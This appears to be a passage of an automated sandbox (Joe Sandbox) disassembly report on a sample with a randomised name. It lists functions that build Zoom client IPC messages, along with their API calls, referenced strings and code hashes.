                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6B43A), ref: 00C8A848
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A87A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A8B7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A8E9
                • EnterCriticalSection.KERNEL32(?), ref: 00C8A9A3
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8A9C0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.save,00000044,00C6B43A), ref: 00C8A9D3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: auto_generated_additional_data$avatar_version$com.Zoom.app.conf.custom3DAvatar.uptoweb.save$component_data$index$is_auto_generated$thumbnail_path$type
                • API String ID: 1443623190-4223377224
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB4016
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,?,00000060,00CB3FD4,CmmPdu,00000000,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB404F
                • ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4,CmmPdu), ref: 00CB4067
                • ?QueryIntValue@XMLAttribute@tinyxml2@@QBE?AW4XMLError@2@PAH@Z.RWSNDPQSKZ(000000FF,version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4), ref: 00CB4076
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(version,?,?,?,?,?,?,?,?,?,?,name,?,00000060,00CB3FD4,CmmPdu), ref: 00CB4088
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name,?,00000060), ref: 00CB40B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name,?), ref: 00CB40F0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,00D334D8,version,?,?,?,?,?,?,?,?,?,?,name), ref: 00CB4103
                  • Part of subcall function 00C60646: __EH_prolog3.LIBCMT ref: 00C6064D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4145
                • ?FirstChildElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z.RWSNDPQSKZ(Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4183
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB4198
                • ?NextSiblingElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z.RWSNDPQSKZ(Node,Node,?,-00000004,00D334D8,?,-00000004,00D334D8,version), ref: 00CB41A4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$Archive@String$??0?$Attribute@Element@Element@2@Element@tinyxml2@@Error@2@Node@tinyxml2@@PackageQueryTreeTree@$AppendAttribute@2@Attribute@tinyxml2@@ChildChild@D@2@@std@@@D@std@@FindFirstH_prolog3H_prolog3_NextNode@Node@23@Root@SiblingState@U?$char_traits@Unlock@V123@@V?$allocator@V?$basic_string@Value@
                • String ID: Node$name$version
                • API String ID: 439996805-3963992849
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: H_prolog3
                • String ID: base_request$emoji_action_result$fetch_emoji_count_info$fetch_emoji_info$fetch_history_comment$fetch_history_thread$fetch_jump_thread$request_optionkeys$sync_comment_count$sync_single_thread$sync_thread$sync_thread_comment_count$sync_thread_comment_countex$undefined_fetch
                • API String ID: 431132790-1587160317
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76157
                • ??0?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAE@PBDH00000000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.open.teamchat.req,000027A9,myAccountId,businessType,sessionId,messageId,threadId,messageSvrTime,threadSvrTime,left,top,width,height,00000004), ref: 00C761A2
                  • Part of subcall function 00C78B50: __EH_prolog3.LIBCMT ref: 00C78B57
                  • Part of subcall function 00C78B50: ??0?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAE@PBDH0000000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,00000004,00C761A7,com.Zoom.app.conf.pmc.open.teamchat.req,000027A9), ref: 00C78B85
                  • Part of subcall function 00C958D2: __EH_prolog3_GS.LIBCMT ref: 00C958D9
                  • Part of subcall function 00C958D2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C761F2), ref: 00C958ED
                  • Part of subcall function 00C958D2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9591F
                  • Part of subcall function 00C958D2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9595C
                  • Part of subcall function 00C958D2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,?,-00000004,com.Zoom.app.conf.pmc.open.teamchat.req,00000044,00C761F2), ref: 00C9598E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@V12@_$H00000000000@H0000000000@H_prolog3_Node@23@Root@Template_10@Template_11@Tree
                • String ID: bDockOut$businessType$com.Zoom.app.conf.pmc.open.teamchat.req$height$left$messageId$messageSvrTime$myAccountId$sessionId$threadId$threadSvrTime$top$width
                • API String ID: 787339479-2942348831
                • Opcode ID: 928ac8601d7b9ea2ad6457c1a7d30f67ac69d16ccd54b39b10f279a055a698dd
                • Instruction ID: daddfb9631b4eed25b1eecded13051070a175eb245f42de425a80233a9ae1315
                • Opcode Fuzzy Hash: 928ac8601d7b9ea2ad6457c1a7d30f67ac69d16ccd54b39b10f279a055a698dd
                • Instruction Fuzzy Hash: AC01D1F1688F45AFC730BB948C17B897AA06710B19F004428B614262D1CBF0160CDB7D
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C968DE
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77537,com.Zoom.app.conf.meeting.wallpaper.start_download), ref: 00C968F8
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C77537,com.Zoom.app.conf.meeting.wallpaper.start_download), ref: 00C96926
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000044), ref: 00C96963
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000044), ref: 00C96993
                • EnterCriticalSection.KERNEL32(?), ref: 00C96A39
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C96A56
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000044), ref: 00C96A69
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: file_scenes$file_type$sha256sum$title$url$wallpaper_id
                • API String ID: 1443623190-2034822180
                • Opcode ID: 222312a8b62ebea238a99939dd872b0d1771ed5da5954011c5b1d81279599b9a
                • Instruction ID: 9189248dcc6d9ccdf31748f8e598969b918f4a5f4ef92af96c589b98bb0fe3be
                • Opcode Fuzzy Hash: 222312a8b62ebea238a99939dd872b0d1771ed5da5954011c5b1d81279599b9a
                • Instruction Fuzzy Hash: E141E275A007189BCF14EFA4C8196ADBBB5AF44301F048118EC12BB391DF309F4AEB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C23A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C3B0), ref: 00C8C24E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,00000044,00C6C3B0), ref: 00C8C280
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2BD
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.request,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C2EF
                • EnterCriticalSection.KERNEL32(?), ref: 00C8C381
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8C39E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.pt.mediaapi.request), ref: 00C8C3B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: check_audio_device$com.Zoom.app.pt.mediaapi.request$mode$req_type$requestID$timeout_seconds
                • API String ID: 1443623190-1181956020
                • Opcode ID: 2d8c844aff0acda8c1c6954aa7f1f778f748db91d1debd7cff9971022f9f17c0
                • Instruction ID: 65f6895c6afae3122b75fc3200487f7e8f2fa2b0169e1780e726257c46ab631b
                • Opcode Fuzzy Hash: 2d8c844aff0acda8c1c6954aa7f1f778f748db91d1debd7cff9971022f9f17c0
                • Instruction Fuzzy Hash: F941E334A007049BCF14EBA4D8856DDB770AF58309F048128EC12BB391DF709E8ADBB9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9638B
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77090), ref: 00C9639F
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.checkupdate_response,00000044,00C77090), ref: 00C963D1
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C9640E
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.checkupdate_response,-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C96440
                • EnterCriticalSection.KERNEL32(?), ref: 00C964D2
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C964EF
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C96502
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.notify.component.checkupdate_response$componentType$downloadURL$latestVersion$releaseNote$result
                • API String ID: 1443623190-374637238
                • Opcode ID: 2c58cad5713a7a74aef0ecce0962090da3e7f5e3bdc3d38c3f3a6579f9cccfb4
                • Instruction ID: f5e8c9aca3a16b8e3cf82907bafb2187d9a624774277fd8c4661db9b0a2aff4d
                • Opcode Fuzzy Hash: 2c58cad5713a7a74aef0ecce0962090da3e7f5e3bdc3d38c3f3a6579f9cccfb4
                • Instruction Fuzzy Hash: B441F174E00708DBCF25EBA4C85969DB7B0AF54305F044128EC12AB3D1DF709B8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90514
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FBC0), ref: 00C90528
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response,00000044,00C6FBC0), ref: 00C9055A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C90597
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response,-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C905C9
                • EnterCriticalSection.KERNEL32(?), ref: 00C9065B
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C90678
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C9068B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response$result$signalType$sourceType$txChannelID$userID
                • API String ID: 1443623190-3843896843
                • Opcode ID: db00518066c8eaf9a5315d1b6a76441b665acfcdbcce7227de7a416640542b50
                • Instruction ID: dad273852357b0a93d64dc0c8c3e57d98fe781d157ed504e0465c1e8c92f3edf
                • Opcode Fuzzy Hash: db00518066c8eaf9a5315d1b6a76441b665acfcdbcce7227de7a416640542b50
                • Instruction Fuzzy Hash: CB41EF74E007149FCF14EBA4C85969DB7B5AF88305F144118FC12AB391DF709E8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8866A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69E40), ref: 00C8867E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc,00000044,00C69E40), ref: 00C886B0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C886ED
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc,-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C8871F
                • EnterCriticalSection.KERNEL32(?), ref: 00C887B1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C887CE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C887E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.notifyConfLeaveErrorDesc$errorDesc$errorDescLink$errorTitle$jfbType$webClientUrl
                • API String ID: 1443623190-4174090930
                • Opcode ID: 053bae247a33a91b9ba46f18af1484dfca60fba94af0dae20cf4d999149999d5
                • Instruction ID: f9c0e4a1f96ef5434fcc6c8de742d0f0d7792685444e048ec0fb09b9adba58c6
                • Opcode Fuzzy Hash: 053bae247a33a91b9ba46f18af1484dfca60fba94af0dae20cf4d999149999d5
                • Instruction Fuzzy Hash: 8A41F438E007089BCF14EBA4D84569EB7B4AF44319F144128FC12AB795DF709E8EDB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E76A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6E730), ref: 00C8E77E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,00000044,00C6E730), ref: 00C8E7B0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E7ED
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E81F
                • EnterCriticalSection.KERNEL32(?), ref: 00C8E8B1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8E8CE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.request$d_microphone$roomName$roomUUID$rxChannelCounts$txChannelCounts
                • API String ID: 1443623190-3337480333
                • Opcode ID: e0be99ede23e49ebf73eaedd1cd84a9ba3247231d7a60008d3ae0c6b32c1668d
                • Instruction ID: 2890690941c1f47d80f57804e13bd57d9361a468991d0c0902fff3b7f020b3a7
                • Opcode Fuzzy Hash: e0be99ede23e49ebf73eaedd1cd84a9ba3247231d7a60008d3ae0c6b32c1668d
                • Instruction Fuzzy Hash: 1D41C234E00709EFCB14EBA4D84669DB775AF44305F044128EC12AB3D1DF709A4AEB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86AF7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68B70), ref: 00C86B0B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,00000044,00C68B70), ref: 00C86B3D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86B7A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86BAC
                • EnterCriticalSection.KERNEL32(?), ref: 00C86C3E
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C86C5B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86C6E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: MeetingID$cmd$com.Zoom.app.conf.plistChanged$screenName$userDeviceID$userFBID
                • API String ID: 1443623190-698755778
                • Opcode ID: 4b00f43a505b96e159e2234d961f3cdc4f293ed1f63983849cf7c3a7b701bf7f
                • Instruction ID: c7f7ead6b82eae578680029c5c978920841cc21ec3043db6cce74d97781d605f
                • Opcode Fuzzy Hash: 4b00f43a505b96e159e2234d961f3cdc4f293ed1f63983849cf7c3a7b701bf7f
                • Instruction Fuzzy Hash: 6F41D074E007049BCB14EBA4D945AADB7B0EF4571AF044128EC12AB391DF709F8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96C06
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77C00), ref: 00C96C1A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.avatar.data.response,00000044,00C77C00), ref: 00C96C4C
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96C89
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.avatar.data.response,-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96CBB
                • EnterCriticalSection.KERNEL32(?), ref: 00C96D4D
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C96D6A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96D7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: avatarLocalPath$avatarURL$com.Zoom.app.meeting.avatar.data.response$email$isIMContact$jid
                • API String ID: 1443623190-2158001762
                • Opcode ID: d03e61313b6896bd7fa2c2e574444e8b70934619b9006a63a883ecb89641d94c
                • Instruction ID: 47d180c6f408258930b6892c3cac1c98d691f5bbaf5fede0c11bfeac7ce93f4d
                • Opcode Fuzzy Hash: d03e61313b6896bd7fa2c2e574444e8b70934619b9006a63a883ecb89641d94c
                • Instruction Fuzzy Hash: 7641E275E007049BCF14EBA4C84969DB770AF45715F044118E822AB3D1DF709B8ADBAA
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86D4A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68CF0), ref: 00C86D5E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,00000044,00C68CF0), ref: 00C86D90
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DCD
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DFF
                • EnterCriticalSection.KERNEL32(?), ref: 00C86E91
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C86EAE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86EC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Agree$MeetingID$MeetingNumber$MyScreenName$Type$com.Zoom.app.meeting.update.disclaimer.status
                • API String ID: 1443623190-1599957615
                • Opcode ID: 895fda9b914c1f5352201f76bfe0721f86de11e43df9c63673c0af34c3d16664
                • Instruction ID: 52279ba91ee09c2fcd3ea9f24f5a4899d3e0c18824ac37f5d7d202b4293b9484
                • Opcode Fuzzy Hash: 895fda9b914c1f5352201f76bfe0721f86de11e43df9c63673c0af34c3d16664
                • Instruction Fuzzy Hash: 3741E278E00704DBCF14EBA4D8456AEB771AF45319F044129EC12AB391DF309A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94D5A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75840), ref: 00C94D6E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.companion.token.response,00000044,00C75840), ref: 00C94DA0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94DDD
